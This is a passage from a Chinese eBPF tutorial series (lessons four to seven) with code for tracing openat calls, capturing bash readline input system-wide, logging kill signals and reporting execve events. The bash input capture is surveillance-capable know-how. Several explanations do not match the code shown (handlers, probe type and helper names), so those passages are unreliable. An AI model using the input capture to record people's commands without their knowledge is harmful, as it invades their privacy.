<pre><code class="language-console">$ sudo cat /sys/kernel/debug/tracing/trace_pipe
|
||
rm-9290 [004] d..2 4637.798698: bpf_trace_printk: fentry: pid = 9290, filename = test_file
|
||
rm-9290 [004] d..2 4637.798843: bpf_trace_printk: fexit: pid = 9290, filename = test_file, ret = 0
|
||
rm-9290 [004] d..2 4637.798698: bpf_trace_printk: fentry: pid = 9290, filename = test_file2
|
||
rm-9290 [004] d..2 4637.798843: bpf_trace_printk: fexit: pid = 9290, filename = test_file2, ret = 0
|
||
</code></pre>
|
||
<h2 id="总结-2"><a class="header" href="#总结-2">总结</a></h2>
|
||
<p>这段程序是一个 eBPF 程序,通过使用 fentry 和 fexit 捕获 do_unlinkat 和 do_unlinkat_exit 函数,并通过使用 bpf_get_current_pid_tgid 和 bpf_printk 函数获取调用 do_unlinkat 的进程 ID、文件名和返回值,并在内核日志中打印出来。</p>
|
||
<p>编译这个程序可以使用 ecc 工具,运行时可以使用 ecli 命令,并通过查看 /sys/kernel/debug/tracing/trace_pipe 文件查看 eBPF 程序的输出。更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档:<a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a></p>
|
||
<p>如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 <a href="https://github.com/eunomia-bpf/bpf-developer-tutorial">https://github.com/eunomia-bpf/bpf-developer-tutorial</a> 以获取更多示例和完整的教程。</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="ebpf-入门开发实践教程四在-ebpf-中捕获进程打开文件的系统调用集合使用全局变量过滤进程-pid"><a class="header" href="#ebpf-入门开发实践教程四在-ebpf-中捕获进程打开文件的系统调用集合使用全局变量过滤进程-pid">eBPF 入门开发实践教程四:在 eBPF 中捕获进程打开文件的系统调用集合,使用全局变量过滤进程 pid</a></h1>
|
||
<p>eBPF(Extended Berkeley Packet Filter)是一种内核执行环境,它可以让用户在内核中运行一些安全的、高效的程序。它通常用于网络过滤、性能分析、安全监控等场景。eBPF 之所以强大,是因为它能够在内核运行时捕获和修改数据包或者系统调用,从而实现对操作系统行为的监控和调整。</p>
|
||
<p>本文是 eBPF 入门开发实践教程的第四篇,主要介绍如何捕获进程打开文件的系统调用集合,并使用全局变量在 eBPF 中过滤进程 pid。</p>
|
||
<p>在 Linux 系统中,进程与文件之间的交互是通过系统调用来实现的。系统调用是用户态程序与内核态程序之间的接口,它们允许用户态程序请求内核执行特定操作。在本教程中,我们关注的是 sys_openat 系统调用,它是用于打开文件的。</p>
|
||
<p>当进程打开一个文件时,它会向内核发出 sys_openat 系统调用,并传递相关参数(例如文件路径、打开模式等)。内核会处理这个请求,并返回一个文件描述符(file descriptor),这个描述符将在后续的文件操作中用作引用。通过捕获 sys_openat 系统调用,我们可以了解进程在什么时候以及如何打开文件。</p>
|
||
<h2 id="在-ebpf-中捕获进程打开文件的系统调用集合"><a class="header" href="#在-ebpf-中捕获进程打开文件的系统调用集合">在 eBPF 中捕获进程打开文件的系统调用集合</a></h2>
|
||
<p>首先,我们需要编写一段 eBPF 程序来捕获进程打开文件的系统调用,具体实现如下:</p>
|
||
<pre><code class="language-c">#include <vmlinux.h>
|
||
#include <bpf/bpf_helpers.h>
|
||
|
||
/// @description "Process ID to trace"
|
||
const volatile int pid_target = 0;
|
||
|
||
SEC("tracepoint/syscalls/sys_enter_openat")
|
||
int tracepoint__syscalls__sys_enter_openat(struct trace_event_raw_sys_enter* ctx)
|
||
{
|
||
u64 id = bpf_get_current_pid_tgid();
|
||
u32 pid = id;
|
||
|
||
if (pid_target && pid_target != pid)
|
||
return false;
|
||
// Use bpf_printk to print the process information
|
||
bpf_printk("Process ID: %d enter sys openat\n", pid);
|
||
return 0;
|
||
}
|
||
|
||
/// "Trace open family syscalls."
|
||
char LICENSE[] SEC("license") = "GPL";
|
||
</code></pre>
|
||
<p>这段 eBPF 程序实现了:</p>
|
||
<ol>
|
||
<li>引入头文件:<vmlinux.h> 包含了内核数据结构的定义,<bpf/bpf_helpers.h> 包含了 eBPF 程序所需的辅助函数。</li>
|
||
<li>定义全局变量 pid_target,用于过滤指定进程 ID。这里设为 0 表示捕获所有进程的 sys_openat 调用。</li>
|
||
<li>使用 SEC 宏定义一个 eBPF 程序,关联到 tracepoint "tracepoint/syscalls/sys_enter_openat"。这个 tracepoint 会在进程发起 sys_openat 系统调用时触发。</li>
|
||
<li>实现 eBPF 程序 tracepoint__syscalls__sys_enter_openat,它接收一个类型为 struct trace_event_raw_sys_enter 的参数 ctx。这个结构体包含了关于系统调用的信息。</li>
|
||
<li>使用 bpf_get_current_pid_tgid() 函数获取当前进程的 PID 和 TGID(线程组 ID)。由于我们只关心 PID,所以将其赋值给 u32 类型的变量 pid。</li>
|
||
<li>检查 pid_target 变量是否与当前进程的 pid 相等。如果 pid_target 不为 0 且与当前进程的 pid 不相等,则返回 false,不对该进程的 sys_openat 调用进行捕获。</li>
|
||
<li>使用 bpf_printk() 函数打印捕获到的进程 ID 和 sys_openat 调用的相关信息。这些信息将在用户空间通过 BPF 工具查看。</li>
|
||
<li>将程序许可证设置为 "GPL",这是运行 eBPF 程序的必要条件。</li>
|
||
</ol>
|
||
<p>这个 eBPF 程序可以通过 libbpf 或 eunomia-bpf 等工具加载到内核并执行。它将捕获指定进程(或所有进程)的 sys_openat 系统调用,并在用户空间输出相关信息。</p>
|
||
<p>eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 <a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a> 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。</p>
|
||
<p>编译运行上述代码:</p>
|
||
<pre><code class="language-console">$ ecc opensnoop.bpf.c
|
||
Compiling bpf object...
|
||
Packing ebpf object and config into package.json...
|
||
$ sudo ecli run package.json
|
||
Runing eBPF program...
|
||
</code></pre>
|
||
<p>运行这段程序后,可以通过查看 /sys/kernel/debug/tracing/trace_pipe 文件来查看 eBPF 程序的输出:</p>
|
||
<pre><code class="language-console">$ sudo cat /sys/kernel/debug/tracing/trace_pipe
|
||
<...>-3840345 [010] d... 3220701.101179: bpf_trace_printk: Process ID: 3840345 enter sys openat
|
||
<...>-3840345 [010] d... 3220702.158000: bpf_trace_printk: Process ID: 3840345 enter sys openat
|
||
</code></pre>
|
||
<p>此时,我们已经能够捕获进程打开文件的系统调用了。</p>
|
||
<h2 id="使用全局变量在-ebpf-中过滤进程-pid"><a class="header" href="#使用全局变量在-ebpf-中过滤进程-pid">使用全局变量在 eBPF 中过滤进程 pid</a></h2>
|
||
<p>全局变量在 eBPF 程序中充当一种数据共享机制,它们允许用户态程序与 eBPF 程序之间进行数据交互。这在过滤特定条件或修改 eBPF 程序行为时非常有用。这种设计使得用户态程序能够在运行时动态地控制 eBPF 程序的行为。</p>
|
||
<p>在我们的例子中,全局变量 <code>pid_target</code> 用于过滤进程 PID。用户态程序可以设置此变量的值,以便在 eBPF 程序中只捕获与指定 PID 相关的 <code>sys_openat</code> 系统调用。</p>
|
||
<p>使用全局变量的原理是,全局变量在 eBPF 程序的数据段(data section)中定义并存储。当 eBPF 程序加载到内核并执行时,这些全局变量会保持在内核中,可以通过 BPF 系统调用进行访问。用户态程序可以使用 BPF 系统调用中的某些特性,如 bpf_obj_get_info_by_fd 和 bpf_obj_get_info,获取 eBPF 对象的信息,包括全局变量的位置和值。</p>
|
||
<p>可以通过执行 ecli -h 命令来查看 opensnoop 的帮助信息:</p>
|
||
<pre><code class="language-console">$ ecli package.json -h
|
||
Usage: opensnoop_bpf [--help] [--version] [--verbose] [--pid_target VAR]
|
||
|
||
Trace open family syscalls.
|
||
|
||
Optional arguments:
|
||
-h, --help shows help message and exits
|
||
-v, --version prints version information and exits
|
||
--verbose prints libbpf debug information
|
||
--pid_target Process ID to trace
|
||
|
||
Built with eunomia-bpf framework.
|
||
See https://github.com/eunomia-bpf/eunomia-bpf for more information.
|
||
</code></pre>
|
||
<p>可以通过 --pid_target 参数来指定要捕获的进程的 pid,例如:</p>
|
||
<pre><code class="language-console">$ sudo ./ecli run package.json --pid_target 618
|
||
Runing eBPF program...
|
||
</code></pre>
|
||
<p>运行这段程序后,可以通过查看 /sys/kernel/debug/tracing/trace_pipe 文件来查看 eBPF 程序的输出:</p>
|
||
<pre><code class="language-console">$ sudo cat /sys/kernel/debug/tracing/trace_pipe
|
||
<...>-3840345 [010] d... 3220701.101179: bpf_trace_printk: Process ID: 618 enter sys openat
|
||
<...>-3840345 [010] d... 3220702.158000: bpf_trace_printk: Process ID: 618 enter sys openat
|
||
</code></pre>
|
||
<h2 id="总结-3"><a class="header" href="#总结-3">总结</a></h2>
|
||
<p>本文介绍了如何使用 eBPF 程序来捕获进程打开文件的系统调用。在 eBPF 程序中,我们可以通过定义 tracepoint__syscalls__sys_enter_open 和 tracepoint__syscalls__sys_enter_openat 函数并使用 SEC 宏把它们附加到 sys_enter_open 和 sys_enter_openat 两个 tracepoint 来捕获进程打开文件的系统调用。我们可以使用 bpf_get_current_pid_tgid 函数获取调用 open 或 openat 系统调用的进程 ID,并使用 bpf_printk 函数在内核日志中打印出来。在 eBPF 程序中,我们还可以通过定义一个全局变量 pid_target 来指定要捕获的进程的 pid,从而过滤输出,只输出指定的进程的信息。</p>
|
||
<p>通过学习本教程,您应该对如何在 eBPF 中捕获和过滤特定进程的系统调用有了更深入的了解。这种方法在系统监控、性能分析和安全审计等场景中具有广泛的应用。</p>
|
||
<p>更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档:<a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a></p>
|
||
<p>如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 <a href="https://github.com/eunomia-bpf/bpf-developer-tutorial">https://github.com/eunomia-bpf/bpf-developer-tutorial</a> 以获取更多示例和完整的教程。</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="ebpf-入门开发实践教程五在-ebpf-中使用--uprobe-捕获-bash-的-readline-函数调用"><a class="header" href="#ebpf-入门开发实践教程五在-ebpf-中使用--uprobe-捕获-bash-的-readline-函数调用">eBPF 入门开发实践教程五:在 eBPF 中使用 uprobe 捕获 bash 的 readline 函数调用</a></h1>
|
||
<p>eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具,它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。</p>
|
||
<p>本文是 eBPF 入门开发实践教程的第五篇,主要介绍如何使用 uprobe 捕获 bash 的 readline 函数调用。</p>
|
||
<h2 id="什么是uprobe"><a class="header" href="#什么是uprobe">什么是uprobe</a></h2>
|
||
<p>uprobe是一种用户空间探针,uprobe探针允许在用户空间程序中动态插桩,插桩位置包括:函数入口、特定偏移处,以及函数返回处。当我们定义uprobe时,内核会在附加的指令上创建快速断点指令(x86机器上为int3指令),当程序执行到该指令时,内核将触发事件,程序陷入到内核态,并以回调函数的方式调用探针函数,执行完探针函数再返回到用户态继续执行后序的指令。</p>
|
||
<p>uprobe基于文件,当一个二进制文件中的一个函数被跟踪时,所有使用到这个文件的进程都会被插桩,包括那些尚未启动的进程,这样就可以在全系统范围内跟踪系统调用。</p>
|
||
<p>uprobe适用于在用户态去解析一些内核态探针无法解析的流量,例如http2流量(报文header被编码,内核无法解码),https流量(加密流量,内核无法解密)。</p>
|
||
<h2 id="使用-uprobe-捕获-bash-的-readline-函数调用"><a class="header" href="#使用-uprobe-捕获-bash-的-readline-函数调用">使用 uprobe 捕获 bash 的 readline 函数调用</a></h2>
|
||
<p>uprobe 是一种用于捕获用户空间函数调用的 eBPF 的探针,我们可以通过它来捕获用户空间程序调用的系统函数。</p>
|
||
<p>例如,我们可以使用 uprobe 来捕获 bash 的 readline 函数调用,从而获取用户在 bash 中输入的命令行。示例代码如下:</p>
|
||
<pre><code class="language-c">#include <vmlinux.h>
|
||
#include <bpf/bpf_helpers.h>
|
||
#include <bpf/bpf_tracing.h>
|
||
|
||
#define TASK_COMM_LEN 16
|
||
#define MAX_LINE_SIZE 80
|
||
|
||
/* Format of u[ret]probe section definition supporting auto-attach:
|
||
* u[ret]probe/binary:function[+offset]
|
||
*
|
||
* binary can be an absolute/relative path or a filename; the latter is resolved to a
|
||
* full binary path via bpf_program__attach_uprobe_opts.
|
||
*
|
||
* Specifying uprobe+ ensures we carry out strict matching; either "uprobe" must be
|
||
* specified (and auto-attach is not possible) or the above format is specified for
|
||
* auto-attach.
|
||
*/
|
||
SEC("uretprobe//bin/bash:readline")
|
||
int BPF_KRETPROBE(printret, const void *ret)
|
||
{
|
||
char str[MAX_LINE_SIZE];
|
||
char comm[TASK_COMM_LEN];
|
||
u32 pid;
|
||
|
||
if (!ret)
|
||
return 0;
|
||
|
||
bpf_get_current_comm(&comm, sizeof(comm));
|
||
|
||
pid = bpf_get_current_pid_tgid() >> 32;
|
||
bpf_probe_read_user_str(str, sizeof(str), ret);
|
||
|
||
bpf_printk("PID %d (%s) read: %s ", pid, comm, str);
|
||
|
||
return 0;
|
||
};
|
||
|
||
char LICENSE[] SEC("license") = "GPL";
|
||
</code></pre>
|
||
<p>这段代码的作用是在 bash 的 readline 函数返回时执行指定的 BPF_KRETPROBE 函数,即 printret 函数。</p>
|
||
<p>在 printret 函数中,我们首先获取了调用 readline 函数的进程的进程名称和进程 ID,然后通过 bpf_probe_read_user_str 函数读取了用户输入的命令行字符串,最后通过 bpf_printk 函数打印出进程 ID、进程名称和输入的命令行字符串。</p>
|
||
<p>除此之外,我们还需要通过 SEC 宏来定义 uprobe 探针,并使用 BPF_KRETPROBE 宏来定义探针函数。</p>
|
||
<p>在 SEC 宏中,我们需要指定 uprobe 的类型、要捕获的二进制文件的路径和要捕获的函数名称。例如,上面的代码中的 SEC 宏的定义如下:</p>
|
||
<pre><code class="language-c">SEC("uprobe//bin/bash:readline")
|
||
</code></pre>
|
||
<p>这表示我们要捕获的是 /bin/bash 二进制文件中的 readline 函数。</p>
|
||
<p>接下来,我们需要使用 BPF_KRETPROBE 宏来定义探针函数,例如:</p>
|
||
<pre><code class="language-c">BPF_KRETPROBE(printret, const void *ret)
|
||
</code></pre>
|
||
<p>这里的 printret 是探针函数的名称,const void *ret 是探针函数的参数,它代表被捕获的函数的返回值。</p>
|
||
<p>然后,我们使用了 bpf_get_current_comm 函数获取当前任务的名称,并将其存储在 comm 数组中。</p>
|
||
<pre><code class="language-c"> bpf_get_current_comm(&comm, sizeof(comm));
|
||
</code></pre>
|
||
<p>使用 bpf_get_current_pid_tgid 函数获取当前进程的 PID,并将其存储在 pid 变量中。</p>
|
||
<pre><code class="language-c"> pid = bpf_get_current_pid_tgid() >> 32;
|
||
</code></pre>
|
||
<p>使用 bpf_probe_read_user_str 函数从用户空间读取 readline 函数的返回值,并将其存储在 str 数组中。</p>
|
||
<pre><code class="language-c"> bpf_probe_read_user_str(str, sizeof(str), ret);
|
||
</code></pre>
|
||
<p>最后使用 bpf_printk 函数输出 PID、任务名称和用户输入的字符串。</p>
|
||
<pre><code class="language-c"> bpf_printk("PID %d (%s) read: %s ", pid, comm, str);
|
||
</code></pre>
|
||
<p>eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 <a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a> 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。</p>
|
||
<p>编译运行上述代码:</p>
|
||
<pre><code class="language-console">$ ecc bashreadline.bpf.c
|
||
Compiling bpf object...
|
||
Packing ebpf object and config into package.json...
|
||
$ sudo ecli run package.json
|
||
Runing eBPF program...
|
||
</code></pre>
|
||
<p>运行这段程序后,可以通过查看 /sys/kernel/debug/tracing/trace_pipe 文件来查看 eBPF 程序的输出:</p>
|
||
<pre><code class="language-console">$ sudo cat /sys/kernel/debug/tracing/trace_pipe
|
||
bash-32969 [000] d..31 64001.375748: bpf_trace_printk: PID 32969 (bash) read: fff
|
||
bash-32969 [000] d..31 64002.056951: bpf_trace_printk: PID 32969 (bash) read: fff
|
||
</code></pre>
|
||
<p>可以看到,我们成功的捕获了 bash 的 readline 函数调用,并获取了用户在 bash 中输入的命令行。</p>
|
||
<h2 id="总结-4"><a class="header" href="#总结-4">总结</a></h2>
|
||
<p>在上述代码中,我们使用了 SEC 宏来定义了一个 uprobe 探针,它指定了要捕获的用户空间程序 (bin/bash) 和要捕获的函数 (readline)。此外,我们还使用了 BPF_KRETPROBE 宏来定义了一个用于处理 readline 函数返回值的回调函数 (printret)。该函数可以获取到 readline 函数的返回值,并将其打印到内核日志中。通过这样的方式,我们就可以使用 eBPF 来捕获 bash 的 readline 函数调用,并获取用户在 bash 中输入的命令行。</p>
|
||
<p>更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档:<a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a></p>
|
||
<p>如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 <a href="https://github.com/eunomia-bpf/bpf-developer-tutorial">https://github.com/eunomia-bpf/bpf-developer-tutorial</a> 以获取更多示例和完整的教程。</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="ebpf-入门开发实践教程六捕获进程发送信号的系统调用集合使用-hash-map-保存状态"><a class="header" href="#ebpf-入门开发实践教程六捕获进程发送信号的系统调用集合使用-hash-map-保存状态">eBPF 入门开发实践教程六:捕获进程发送信号的系统调用集合,使用 hash map 保存状态</a></h1>
|
||
<p>eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具,它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。</p>
|
||
<p>本文是 eBPF 入门开发实践教程的第六篇,主要介绍如何实现一个 eBPF 工具,捕获进程发送信号的系统调用集合,使用 hash map 保存状态。</p>
|
||
<h2 id="sigsnoop"><a class="header" href="#sigsnoop">sigsnoop</a></h2>
|
||
<p>示例代码如下:</p>
|
||
<pre><code class="language-c">#include <vmlinux.h>
|
||
#include <bpf/bpf_helpers.h>
|
||
#include <bpf/bpf_tracing.h>
|
||
|
||
#define MAX_ENTRIES 10240
|
||
#define TASK_COMM_LEN 16
|
||
|
||
struct event {
|
||
unsigned int pid;
|
||
unsigned int tpid;
|
||
int sig;
|
||
int ret;
|
||
char comm[TASK_COMM_LEN];
|
||
};
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__uint(max_entries, MAX_ENTRIES);
|
||
__type(key, __u32);
|
||
__type(value, struct event);
|
||
} values SEC(".maps");
|
||
|
||
|
||
static int probe_entry(pid_t tpid, int sig)
|
||
{
|
||
struct event event = {};
|
||
__u64 pid_tgid;
|
||
__u32 tid;
|
||
|
||
pid_tgid = bpf_get_current_pid_tgid();
|
||
tid = (__u32)pid_tgid;
|
||
event.pid = pid_tgid >> 32;
|
||
event.tpid = tpid;
|
||
event.sig = sig;
|
||
bpf_get_current_comm(event.comm, sizeof(event.comm));
|
||
bpf_map_update_elem(&values, &tid, &event, BPF_ANY);
|
||
return 0;
|
||
}
|
||
|
||
static int probe_exit(void *ctx, int ret)
|
||
{
|
||
__u64 pid_tgid = bpf_get_current_pid_tgid();
|
||
__u32 tid = (__u32)pid_tgid;
|
||
struct event *eventp;
|
||
|
||
eventp = bpf_map_lookup_elem(&values, &tid);
|
||
if (!eventp)
|
||
return 0;
|
||
|
||
eventp->ret = ret;
|
||
bpf_printk("PID %d (%s) sent signal %d to PID %d, ret = %d",
|
||
eventp->pid, eventp->comm, eventp->sig, eventp->tpid, ret);
|
||
|
||
cleanup:
|
||
bpf_map_delete_elem(&values, &tid);
|
||
return 0;
|
||
}
|
||
|
||
SEC("tracepoint/syscalls/sys_enter_kill")
|
||
int kill_entry(struct trace_event_raw_sys_enter *ctx)
|
||
{
|
||
pid_t tpid = (pid_t)ctx->args[0];
|
||
int sig = (int)ctx->args[1];
|
||
|
||
return probe_entry(tpid, sig);
|
||
}
|
||
|
||
SEC("tracepoint/syscalls/sys_exit_kill")
|
||
int kill_exit(struct trace_event_raw_sys_exit *ctx)
|
||
{
|
||
return probe_exit(ctx, ctx->ret);
|
||
}
|
||
|
||
char LICENSE[] SEC("license") = "Dual BSD/GPL";
|
||
</code></pre>
|
||
<p>上面的代码定义了一个 eBPF 程序,用于捕获进程发送信号的系统调用,包括 kill、tkill 和 tgkill。它通过使用 tracepoint 来捕获系统调用的进入和退出事件,并在这些事件发生时执行指定的探针函数,例如 probe_entry 和 probe_exit。</p>
|
||
<p>在探针函数中,我们使用 bpf_map 存储捕获的事件信息,包括发送信号的进程 ID、接收信号的进程 ID、信号值和系统调用的返回值。在系统调用退出时,我们将获取存储在 bpf_map 中的事件信息,并使用 bpf_printk 打印进程 ID、进程名称、发送的信号和系统调用的返回值。</p>
|
||
<p>最后,我们还需要使用 SEC 宏来定义探针,并指定要捕获的系统调用的名称,以及要执行的探针函数。</p>
|
||
<p>eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 <a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a> 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。</p>
|
||
<p>编译运行上述代码:</p>
|
||
<pre><code class="language-shell">docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest
|
||
</code></pre>
|
||
<p>或者</p>
|
||
<pre><code class="language-console">$ ecc sigsnoop.bpf.c
|
||
Compiling bpf object...
|
||
Generating export types...
|
||
Packing ebpf object and config into package.json...
|
||
$ sudo ecli run package.json
|
||
Runing eBPF program...
|
||
</code></pre>
|
||
<p>运行这段程序后,可以通过查看 /sys/kernel/debug/tracing/trace_pipe 文件来查看 eBPF 程序的输出:</p>
|
||
<pre><code class="language-console">$ sudo cat /sys/kernel/debug/tracing/trace_pipe
|
||
node-3517 [003] d..31 82575.798191: bpf_trace_printk: PID 3517 (node) sent signal 0 to PID 3427, ret = 0
|
||
node-15194 [003] d..31 82575.849227: bpf_trace_printk: PID 15194 (node) sent signal 0 to PID 3427, ret = 0
|
||
node-30016 [003] d..31 82576.001361: bpf_trace_printk: PID 30016 (node) sent signal 0 to PID 3427, ret = 0
|
||
cpptools-srv-38617 [002] d..31 82576.461085: bpf_trace_printk: PID 38617 (cpptools-srv) sent signal 0 to PID 30496, ret = 0
|
||
node-30040 [002] d..31 82576.467720: bpf_trace_printk: PID 30016 (node) sent signal 0 to PID 3427, ret = 0
|
||
</code></pre>
|
||
<h2 id="总结-5"><a class="header" href="#总结-5">总结</a></h2>
|
||
<p>本文主要介绍如何实现一个 eBPF 工具,捕获进程发送信号的系统调用集合,使用 hash map 保存状态。使用 hash map 需要定义一个结构体:</p>
|
||
<pre><code class="language-c">struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__uint(max_entries, MAX_ENTRIES);
|
||
__type(key, __u32);
|
||
__type(value, struct event);
|
||
} values SEC(".maps");
|
||
</code></pre>
|
||
<p>并使用一些对应的 API 进行访问,例如 bpf_map_lookup_elem、bpf_map_update_elem、bpf_map_delete_elem 等。</p>
|
||
<p>更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档:<a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a></p>
|
||
<p>如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 <a href="https://github.com/eunomia-bpf/bpf-developer-tutorial">https://github.com/eunomia-bpf/bpf-developer-tutorial</a> 以获取更多示例和完整的教程。</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="ebpf-入门实践教程七捕获进程执行退出时间通过-perf-event-array-向用户态打印输出"><a class="header" href="#ebpf-入门实践教程七捕获进程执行退出时间通过-perf-event-array-向用户态打印输出">eBPF 入门实践教程七:捕获进程执行/退出时间,通过 perf event array 向用户态打印输出</a></h1>
|
||
<p>eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具,它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。</p>
|
||
<p>本文是 eBPF 入门开发实践教程的第七篇,主要介绍如何捕获 Linux 内核中进程执行的事件,并且通过 perf event array 向用户态命令行打印输出,不需要再通过查看 /sys/kernel/debug/tracing/trace_pipe 文件来查看 eBPF 程序的输出。通过 perf event array 向用户态发送信息之后,可以进行复杂的数据处理和分析。</p>
|
||
<h2 id="perf-buffer"><a class="header" href="#perf-buffer">perf buffer</a></h2>
|
||
<p>eBPF 提供了两个环形缓冲区,可以用来将信息从 eBPF 程序传输到用户区控制器。第一个是perf环形缓冲区,,它至少从内核v4.15开始就存在了。第二个是后来引入的 BPF 环形缓冲区。本文只考虑perf环形缓冲区。</p>
|
||
<h2 id="execsnoop"><a class="header" href="#execsnoop">execsnoop</a></h2>
|
||
<p>通过 perf event array 向用户态命令行打印输出,需要编写一个头文件,一个 C 源文件。示例代码如下:</p>
|
||
<p>头文件:execsnoop.h</p>
|
||
<pre><code class="language-c">#ifndef __EXECSNOOP_H
|
||
#define __EXECSNOOP_H
|
||
|
||
#define TASK_COMM_LEN 16
|
||
|
||
struct event {
|
||
int pid;
|
||
int ppid;
|
||
int uid;
|
||
int retval;
|
||
bool is_exit;
|
||
char comm[TASK_COMM_LEN];
|
||
};
|
||
|
||
#endif /* __EXECSNOOP_H */
|
||
</code></pre>
|
||
<p>源文件:execsnoop.bpf.c</p>
|
||
<pre><code class="language-c">// SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause)
|
||
#include <vmlinux.h>
|
||
#include <bpf/bpf_helpers.h>
|
||
#include <bpf/bpf_core_read.h>
|
||
#include "execsnoop.h"
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY);
|
||
__uint(key_size, sizeof(u32));
|
||
__uint(value_size, sizeof(u32));
|
||
} events SEC(".maps");
|
||
|
||
SEC("tracepoint/syscalls/sys_enter_execve")
|
||
int tracepoint__syscalls__sys_enter_execve(struct trace_event_raw_sys_enter* ctx)
|
||
{
|
||
u64 id;
|
||
pid_t pid, tgid;
|
||
struct event event={0};
|
||
struct task_struct *task;
|
||
|
||
uid_t uid = (u32)bpf_get_current_uid_gid();
|
||
id = bpf_get_current_pid_tgid();
|
||
tgid = id >> 32;
|
||
|
||
event.pid = tgid;
|
||
event.uid = uid;
|
||
task = (struct task_struct*)bpf_get_current_task();
|
||
event.ppid = BPF_CORE_READ(task, real_parent, tgid);
|
||
bpf_get_current_comm(&event.comm, sizeof(event.comm));
|
||
bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU, &event, sizeof(event));
|
||
return 0;
|
||
}
|
||
|
||
char LICENSE[] SEC("license") = "GPL";
|
||
</code></pre>
|
||
<p>这段代码定义了个 eBPF 程序,用于捕获进程执行 execve 系统调用的入口。</p>
|
||
<p>在入口程序中,我们首先获取了当前进程的进程 ID 和用户 ID,然后通过 bpf_get_current_task 函数获取了当前进程的 task_struct 结构体,并通过 bpf_probe_read_str 函数读取了进程名称。最后,我们通过 bpf_perf_event_output 函数将进程执行事件输出到 perf buffer。</p>
|
||
<p>使用这段代码,我们就可以捕获 Linux 内核中进程执行的事件, 并分析进程的执行情况。</p>
|
||
<p>eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 <a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a> 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。</p>
|
||
<p>使用容器编译:</p>
|
||
<pre><code class="language-shell">docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest
|
||
</code></pre>
|
||
<p>或者使用 ecc 编译:</p>
|
||
<pre><code class="language-shell">ecc execsnoop.bpf.c execsnoop.h
|
||
</code></pre>
|
||
<p>运行</p>
|
||
<pre><code class="language-console">$ sudo ./ecli run package.json
|
||
TIME PID PPID UID COMM
|
||
21:28:30 40747 3517 1000 node
|
||
21:28:30 40748 40747 1000 sh
|
||
21:28:30 40749 3517 1000 node
|
||
21:28:30 40750 40749 1000 sh
|
||
21:28:30 40751 3517 1000 node
|
||
21:28:30 40752 40751 1000 sh
|
||
21:28:30 40753 40752 1000 cpuUsage.sh
|
||
</code></pre>
|
||
<h2 id="总结-6"><a class="header" href="#总结-6">总结</a></h2>
|
||
<p>本文介绍了如何捕获 Linux 内核中进程执行的事件,并且通过 perf event array 向用户态命令行打印输出,通过 perf event array 向用户态发送信息之后,可以进行复杂的数据处理和分析。在 libbpf 对应的内核态代码中,定义这样一个结构体和对应的头文件:</p>
|
||
<pre><code class="language-c">struct {
|
||
__uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY);
|
||
__uint(key_size, sizeof(u32));
|
||
__uint(value_size, sizeof(u32));
|
||
} events SEC(".maps");
|
||
</code></pre>
|
||
<p>就可以往用户态直接发送信息。</p>
|
||
<p>更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档:<a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a></p>
|
||
